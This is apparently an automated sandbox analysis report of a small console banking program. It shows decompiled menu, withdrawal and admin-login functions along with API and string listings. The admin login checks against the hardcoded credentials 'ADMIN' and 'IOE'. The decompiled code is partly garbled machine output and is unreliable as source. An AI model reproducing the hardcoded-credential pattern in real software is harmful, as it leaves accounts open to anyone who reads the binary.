				E012B3AB0(_t108, _t121, _t122, _t148);
				do {
					E012B20E0(_t111, _t121, _t122, __eflags, _t148);
					E012B12B0(0xf, 8);
					_push("1. Create New Account\n");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xa);
					_push("2. Cash Deposit");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xc);
					_push("3. Cash Withdrawl");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0xe);
					_push("4. Fund Transfer");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0xf, 0x10);
					_push("5. Account information");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 8);
					_push("6. Transaction information");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 0xa);
					_push("7. Log out");
					E012B715C(_t108, _t121, _t122, __eflags);
					E012B12B0(0x2d, 0xc);
					_push("8. Exit");
					E012B715C(_t108, _t121, _t122, __eflags);
					_t139 = _t131 + 0x20;
					E012B12B0(1, 0x11);
					_v24 = 0;
					while(1) {
						__eflags = _v24 - 0x4e;
						if(__eflags >= 0) {
							break;
						}
						_push("_");
						E012B715C(_t108, _t121, _t122, __eflags);
						_t139 = _t139 + 4;
						_t111 = _v24 + 1;
						__eflags = _t111;
						_v24 = _t111;
					}
					E012B12B0(0x17, 0x13);
					_push("Press a choice between the range [1-8] ");
					E012B715C(_t108, _t121, _t122, __eflags);
					_t131 = _t139 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					__eflags = _v16 - 7;
					if(__eflags > 0) {
						E012B20E0(_t111, _t121, _t122, __eflags, _t148);
						E012B12B0(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 8!");
						E012B715C(_t108, _t121, _t122, __eflags);
						E012B12B0(0xf, 0xc);
						_push("Press any key to return to main menu...");
						E012B715C(_t108, _t121, _t122, __eflags);
						_t131 = _t131 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M012B3A88))) {
							case 0:
								E012B3DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
								goto L35;
							case 1:
								__eax = E012B4640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 2:
								__eax = E012B49E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 3:
								__eax = E012B4E90(__ebx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 4:
								__eax = E012B5600(__ebx, __ecx, __eflags, __fp0);
								goto L35;
							case 5:
								__eax = E012B6190(__ebx, __ecx, __edx, __fp0);
								goto L35;
							case 6:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0) = E012B12B0(0xf, 0xa);
								_push("Are you sure you want to Log out? <Y/N> : ");
								__eax = E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__ecx = _v5;
								__eflags = __ecx - 0x59;
								if(__eflags == 0) {
									L28:
									_t40 =  &_v36; // -15
									_t40 = E012B8417(__eflags, _t40);
									 *0x12d2f28 = E012B6EF1("LOG.DAT", "a");
									_t41 =  &_v36; // -15
									__ecx = _t41;
									_push(_t41);
									_t42 =  &_v80; // -59
									__edx = _t42;
									_push(_t42);
									_push(0x12d2f40);
									_push(0x12d2ee0);
									_push("%s %s %s %s\n");
									__eax =  *0x12d2f28; // 0x0
									_push(__eax);
									__eax = E012B6F06(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__ecx =  *0x12d2f28; // 0x0
									_push(__ecx);
									__eax = E012B6DB6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E012B3610(__ebx, __edi, __esi, __fp0);
								} else {
									__edx = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0) = E012B12B0(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								__eax = E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(__eflags == 0) {
									L32:
									_t45 =  &_v36; // -15
									__ecx = _t45;
									__eax = E012B8417(__eflags, _t45);
									 *0x12d2f28 = E012B6EF1("LOG.DAT", "a");
									_t46 =  &_v36; // -15
									__edx = _t46;
									_push(_t46);
									_t47 =  &_v80; // -59
									__eax = _t47;
									_push(_t47);
									_push(0x12d2f40);
									_push(0x12d2ee0);
									_push("%s %s %s %s\n");
									__ecx =  *0x12d2f28; // 0x0
									_push(__ecx);
									__eax = E012B6F06(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__edx =  *0x12d2f28; // 0x0
									_push(__edx);
									__eax = E012B6DB6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E012B77B1(0);
								} else {
									__eax = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
					__eflags = 1;
				} while (1 != 0);
				return 1;
			}

APIs

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B3667
_wprintf.LIBCMT ref: 012B367D

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wscanf.LIBCMT ref: 012B368F

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B36A5

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

_wprintf.LIBCMT ref: 012B36D8
_wprintf.LIBCMT ref: 012B3863
_wprintf.LIBCMT ref: 012B3879
_wprintf.LIBCMT ref: 012B38A7

Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E21
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E54
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3E6C
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3E80
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3E94
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3EAA
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3EBB
Part of subcall function 012B3DE0: _wprintf.LIBCMT ref: 012B3ED1
Part of subcall function 012B3DE0: _wscanf.LIBCMT ref: 012B3EE2

_wprintf.LIBCMT ref: 012B38BF
_wprintf.LIBCMT ref: 012B36EE

Part of subcall function 012B77B1: _doexit.LIBCMT ref: 012B77BB

_swscanf.LIBCMT ref: 012B3735
_wprintf.LIBCMT ref: 012B37A2
__wstrtime.LIBCMT ref: 012B37BF
_wprintf.LIBCMT ref: 012B37DF
_wprintf.LIBCMT ref: 012B37F5
_wprintf.LIBCMT ref: 012B380B
_wprintf.LIBCMT ref: 012B3821
_wprintf.LIBCMT ref: 012B3837
_wprintf.LIBCMT ref: 012B384D

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Strings

1. Create New Account, xrefs: 012B37DA
Press any key to return to main menu..., xrefs: 012B3A67
Press ENTER to exit the program..., xrefs: 012B36E9
2. Cash Deposit, xrefs: 012B37F0
Your input is out of range! Enter a choice between 1 to 8!, xrefs: 012B3A51
N, xrefs: 012B389C
0, xrefs: 012B38C7
3. Cash Withdrawl, xrefs: 012B3806
USER.DAT, xrefs: 012B3709
Press a choice between the range [1-8] , xrefs: 012B38BA
4. Fund Transfer, xrefs: 012B381C
%s %s %s, xrefs: 012B372A
6. Transaction information, xrefs: 012B3848
Password : , xrefs: 012B36A0
5. Account information, xrefs: 012B3832
Are you sure you want to Log out? <Y/N> : , xrefs: 012B3935
8. Exit, xrefs: 012B3874
Enter User name : , xrefs: 012B3678
Are you sure you want to exit? <Y/N> : , xrefs: 012B39C3
LOG.DAT, xrefs: 012B3965
Only THREE attempts shall be allowed to enter username and password., xrefs: 012B3662
LOG.DAT, xrefs: 012B39F3
7. Log out, xrefs: 012B385E
%s %s %s %s, xrefs: 012B3989
%s %s %s %s, xrefs: 012B3A17

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
API String ID: 1611355571-1720101819
Opcode ID: 5c6bb224be2e171e795f2c766a7dc88186fb2b1179dff10844c2d1062d86d202
Instruction ID: e29cc4c405fec96e497e50d75119aa70789d78a999ba5c9b79c5ed52269d5d38
Opcode Fuzzy Hash: 5c6bb224be2e171e795f2c766a7dc88186fb2b1179dff10844c2d1062d86d202
Instruction Fuzzy Hash: C8A1A2F1EB0207AAE714FBE09CD3BFE76216F61BC0F004629E605752C1EAB162184767

Uniqueness

Uniqueness Score: -1.00%

Function 012B49E0, Relevance: 65.1, APIs: 17, Strings: 20, Instructions: 328
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E012B49E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v376;
				char _v456;
				void* __ebp;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t75;
				void* _t76;
				intOrPtr _t77;
				void* _t81;
				char _t97;
				intOrPtr _t99;
				void* _t104;
				intOrPtr _t105;
				intOrPtr _t110;
				void* _t117;
				void* _t122;
				void* _t127;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t168;
				intOrPtr _t173;
				void* _t177;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t193;
				void* _t195;
				void* _t196;
				void* _t205;

				_t215 = __fp0;
				_t176 = __esi;
				_t175 = __edi;
				_t132 = __ecx;
				_t131 = __ebx;
				_v16 = 0;
				E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
				E012B12B0(5, 0xa);
				_push("Withdraw from A/C number          : ");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B738B("%s",  &_v28);
				_t64 = E012B6EF1("ACCOUNT.DAT", "r");
				_t180 = _t177 + 0x14;
				 *0x12d2f28 = _t64;
				_t214 = _v16;
				if(_v16 == 0) {
					E012B20E0(_t132, __edi, __esi, _t214, __fp0);
					E012B12B0(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E012B715C(__ebx, _t175, _t176, _t214);
				}
				E012B12B0(0x32, 0xa);
				_push( &_v376);
				_push("[ %s ]");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B12B0(5, 0xc);
				_push("Amount to be Withdrawn (in NRs.)  : ");
				E012B715C(__ebx, _t175, _t176, __eflags);
				E012B738B("%f",  &_v12);
				_t70 = E012B6EF1("ACCOUNT.DAT", "r");
				_t184 = _t180 + 0x1c;
				 *0x12d2f28 = _t70;
				_v16 = 0;
				while(1) {
					_push( &_v32);
					_push( &_v36);
					_push( &_v40);
					_push( &_v42);
					_push( &_v140);
					_push( &_v113);
					_push( &_v62);
					_push( &_v112);
					_push( &_v125);
					_push( &_v170);
					_push( &_v200);
					_t75 =  *0x12d2f28; // 0x0
					_t76 = E012B7021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
					_t185 = _t184 + 0x38;
					__eflags = _t76 - 0xffffffff;
					if(__eflags == 0) {
						break;
					}
					_t122 = E012B8230( &_v208,  &_v28);
					_t184 = _t185 + 8;
					__eflags = _t122;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0x8]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E012B20E0( &_v28, _t175, _t176, __eflags, _t215);
							E012B12B0(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							_push("Sorry, the current balance is Rs. %.2f only!");
							E012B715C(_t131, _t175, _t176, __eflags);
							E012B12B0(0x19, 0xe);
							_push("Transaction NOT completed!");
							_t127 = E012B715C(_t131, _t175, _t176, __eflags);
							_v16 = 1;
							return _t127;
						}
					}
				}
				_t77 =  *0x12d2f28; // 0x0
				_push(_t77);
				E012B6DB6(_t131, _t175, _t176, __eflags);
				E012B20E0( &_v200, _t175, _t176, __eflags, _t215);
				E012B12B0(0x1e, 0xa);
				_push("Confirm Transaction");
				_t81 = E012B715C(_t131, _t175, _t176, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E012B1870(_t81,  &_v244);
				E012B12B0(3, 0xc);
				_push( &_v376);
				_push( &_v28);
				E012B715C(_t131, _t175, _t176, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E012B1B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
				E012B8140( &_v324,  &_v456);
				E012B8140( &_v324, "]");
				E012B12B0(0x28 - (E012B82C0( &_v324) >> 1), 0xe);
				_push( &_v324);
				E012B7229(_t131, _t175, _t176, __eflags);
				E012B12B0(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E012B715C(_t131, _t175, _t176, __eflags);
				_t193 = _t185 + 0x14 - 8 + 0x1c;
				_t97 = _v5;
				__eflags = _t97 - 0x59;
				if(_t97 == 0x59) {
					L10:
					 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
					_t99 = E012B6EF1("TEMP.DAT", "w");
					_t195 = _t193 + 0x10;
					 *0x12d2f24 = _t99;
					_v16 = 0;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t168 =  *0x12d2f28; // 0x0
						_t104 = E012B7021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t196 = _t195 + 0x38;
						__eflags = _t104 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t117 = E012B8230( &_v208,  &_v28);
						_t205 = _t196 + 8;
						__eflags = _t117;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0x12c8210]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0x12c8210]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t173 =  *0x12d2f24; // 0x0
						_push(_t173);
						E012B6F06(_t131, _t175, _t176, __eflags);
						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
					}
					_t105 =  *0x12d2f24; // 0x0
					_push(_t105);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					_t147 =  *0x12d2f28; // 0x0
					_push(_t147);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					 *0x12d2f28 = E012B6EF1("TRANSACTION.DAT", "a");
					E012B8417(__eflags, 0x12d2f30);
					_push(0x12d2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x12d2f30);
					_push(0x12d2f40);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t110 =  *0x12d2f28; // 0x0
					_push(_t110);
					E012B6F06(_t131, _t175, _t176, __eflags);
					_t148 =  *0x12d2f28; // 0x0
					_push(_t148);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					E012B20E0(_t148, _t175, _t176, __eflags, _t215);
					E012B12B0(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E012B715C(_t131, _t175, _t176, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L10;
				}
				return _t97;
			}

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B4A03
_wscanf.LIBCMT ref: 012B4A14

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_wprintf.LIBCMT ref: 012B4A4C

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B4A6E
_wprintf.LIBCMT ref: 012B4A84
_wscanf.LIBCMT ref: 012B4A95
_swscanf.LIBCMT ref: 012B4B02
_wprintf.LIBCMT ref: 012B4B51
_wprintf.LIBCMT ref: 012B4B67

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

Strings

Sorry, the current balance is Rs. %.2f only!, xrefs: 012B4B4C
Confirm Transaction, xrefs: 012B4B9C
%s to be Withdrawn from A/C number : %s [%s], xrefs: 012B4BD7
Transaction completed successfully!, xrefs: 012B4E77
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B4AF7
Amount to be Withdrawn (in NRs.) : , xrefs: 012B4A7F
Given A/C number does not exits!, xrefs: 012B4A47
TRANSACTION.DAT, xrefs: 012B4E03
%s %s %s %s %.2f %s, xrefs: 012B4E47
Withdraw from A/C number : , xrefs: 012B49FE
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B4DC8
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012B4C5F
TEMP.DAT, xrefs: 012B4C9E
Cash+Withdrawn, xrefs: 012B4E3E
Transaction NOT completed!, xrefs: 012B4B62
ACCOUNT.DAT, xrefs: 012B4C87
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B4CF3
ACCOUNT.DAT, xrefs: 012B4A21
ACCOUNT.DAT, xrefs: 012B4AA2
[ %s ], xrefs: 012B4A69

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
API String ID: 427838879-2716176803
Opcode ID: ab223d644b8290b8f65995c5ea9587f491c03c89e0979869026e12f2d702b97a
Instruction ID: b1e0586d8472362199a3044c360e6e5771475ef33b7a1827b76cfd2bdb18b2d2
Opcode Fuzzy Hash: ab223d644b8290b8f65995c5ea9587f491c03c89e0979869026e12f2d702b97a
Instruction Fuzzy Hash: 71C1B7B2D3020AAFDB15EBA5DCC1EEE7378AF69740F044659F60576080F67066488FB5

Uniqueness

Uniqueness Score: -1.00%

Function 012B22F0, Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012B22F0(void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				void* __ebp;
				void* _t50;
				void* _t74;
				void* _t78;
				void* _t85;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t100;
				void* _t101;
				void* _t106;
				void* _t116;

				_t116 = __fp0;
				_t95 = __esi;
				_t94 = __edi;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E012B12B0(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E012B715C(_t85, _t94, _t95, 0);
					E012B1380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
					E012B12B0(0x17, 0xa);
					_push("Enter User name : ");
					E012B715C(_t85, _t94, _t95, 0);
					E012B738B("%s",  &_v92);
					E012B12B0(0x17, 0xc);
					_push("Password        : ");
					E012B715C(_t85, _t94, _t95, 0);
					_t100 = _t96 + 0x14;
					E012B12F0(_t94, _t95,  &_v60);
					_v16 = _v16 + 1;
					_t110 = _v16 - 3;
					if(_v16 == 3) {
						E012B20E0( &_v92, _t94, _t95, _t110, _t116);
						E012B12B0(0x19, 8);
						_push(0x12cf224);
						E012B715C(_t85, _t94, _t95, _t110);
						E012B12B0(0x16, 0xb);
						_push("Press any key to exit the program...");
						E012B715C(_t85, _t94, _t95, _t110);
						_t100 = _t100 + 8;
						E012B77B1(0);
					}
					_t87 =  &_v92;
					_t50 = E012B8230( &_v92, "ADMIN");
					_t101 = _t100 + 8;
					if(_t50 != 0) {
						L6:
						E012B20E0(_t87, _t94, _t95, __eflags, _t116);
						E012B12B0(0x19, 0xa);
						_push(0x12cf278);
						E012B715C(_t85, _t94, _t95, __eflags);
						_t96 = _t101 + 4;
					} else {
						_t78 = E012B8230( &_v60, "IOE");
						_t101 = _t101 + 8;
						if(_t78 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
					_t113 = _v20 - 1;
				} while (_v20 != 1);
				do {
					E012B20E0(_t87, _t94, _t95, _t113, _t116);
					E012B12B0(0x1e, 8);
					_push("1. Add User");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xa);
					_push("2. Delete User");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xc);
					_push("3. Edit User name / Password");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xe);
					_push("4. View User Log");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0x10);
					_push("5. Exit");
					E012B715C(_t85, _t94, _t95, _t113);
					_t106 = _t96 + 0x14;
					E012B12B0(1, 0x11);
					_v24 = 0;
					while(1) {
						_t114 = _v24 - 0x4e;
						if(_v24 >= 0x4e) {
							break;
						}
						_push("_");
						E012B715C(_t85, _t94, _t95, _t114);
						_t106 = _t106 + 4;
						_v24 = _v24 + 1;
					}
					E012B12B0(0x17, 0x13);
					_push(" Press a number between the range [1 -5]  ");
					E012B715C(_t85, _t94, _t95, __eflags);
					_t96 = _t106 + 4;
					_t89 = _v6 - 0x30;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E012B20E0(_t89, _t94, _t95, __eflags, _t116);
						E012B12B0(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 5!");
						E012B715C(_t85, _t94, _t95, __eflags);
						E012B12B0(0xf, 0xc);
						_push("Press ENTER to return to main menu...");
						_t74 = E012B715C(_t85, _t94, _t95, __eflags);
						_t96 = _t96 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M012B25A8))) {
							case 0:
								_t74 = E012B25C0(_t85, _t94, _t95, _t116);
								goto L23;
							case 1:
								E012B2800(__ebx, __ecx, __edi, __esi, __fp0);
								goto L23;
							case 2:
								E012B2B10(__ebx, __edi, __esi, __fp0);
								goto L23;
							case 3:
								E012B2E80(__ebx, __edx, __eflags, __fp0);
								goto L23;
							case 4:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
								E012B12B0(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									E012B77B1(0);
								} else {
									__eflags = _v5 - 0x79;
									if(_v5 == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					_t87 = 1;
					__eflags = 1;
				} while (1 != 0);
				return _t74;
			}

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2337

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

_wprintf.LIBCMT ref: 012B235A

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wscanf.LIBCMT ref: 012B236B

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B2381

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

_wprintf.LIBCMT ref: 012B23B4
_wprintf.LIBCMT ref: 012B241F

Part of subcall function 012B25C0: _wprintf.LIBCMT ref: 012B262D
Part of subcall function 012B25C0: _wscanf.LIBCMT ref: 012B263F
Part of subcall function 012B25C0: _swscanf.LIBCMT ref: 012B2681
Part of subcall function 012B25C0: _wprintf.LIBCMT ref: 012B26D1

_wprintf.LIBCMT ref: 012B23CA

Part of subcall function 012B77B1: _doexit.LIBCMT ref: 012B77BB

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

